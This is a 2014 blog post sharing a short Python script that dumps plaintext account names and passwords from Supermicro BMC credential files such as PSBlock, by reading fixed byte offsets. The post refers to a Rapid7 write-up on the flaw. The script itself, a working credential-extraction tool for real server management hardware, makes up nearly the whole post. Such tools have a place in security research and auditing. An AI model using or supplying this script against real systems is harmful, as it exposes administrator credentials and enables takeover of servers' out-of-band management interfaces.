Jan 252014
 

A trivial utility to dump password/account information from a special file found on a SM BMC (see this R7 post about the PSBlock file.)

(Later edit – put a new version on github that fixes a bug)

#!/usr/bin/env python

# usage: $0 file

#
# (try to) Dump out passwords/accounts from a SM binary file;
# usually this is in /conf or /vm on the BMC, and goes by
# various names such as PSBlock, PSStore, PMConfig.dat, and
# the like.  This has *only* been tested on PSBlock files,
# but the theory appears to be the same; find the first account
# and password pair and march through the file at regular
# intervals until you find all the matches.
#

import re
import sys

ACCOUNT_SIZE  = 16
PASSWD_SIZE   = 20   # IPMI 2.0
FIRST_ACCOUNT = 85   # the fun starts here
NEXT_ACCOUNT  = 64   # N bytes later
MAX_ACCOUNTS  =  9   # a guess

try:
   sm = open(sys.argv[1], "rb")

except:
   print("couldn't open %s" % sys.argv[1])
   sys.exit(2)

# skip first 84 bytes
sm.seek(FIRST_ACCOUNT,0)

# loop for accounts/passwords
for i in range(0,MAX_ACCOUNTS + 1):

   # go to the right place
   sm.seek(FIRST_ACCOUNT + i * NEXT_ACCOUNT, 0)

   # grabit
   account = sm.read(ACCOUNT_SIZE)
   passwd  = sm.read(PASSWD_SIZE)

   # strip nulls
   account = re.sub('\000*$', '', account)
   passwd  = re.sub('\000*$', '', passwd)

   if len(account) > 0 and account[0] != '\000':
      print("Account [%d]: %s" % (i, account))
      print("Password[%d]: %s" % (i, passwd))

sm.close()
 Posted by at 2:32 pm on January 25, 2014

Sorry, the comment form is closed at this time.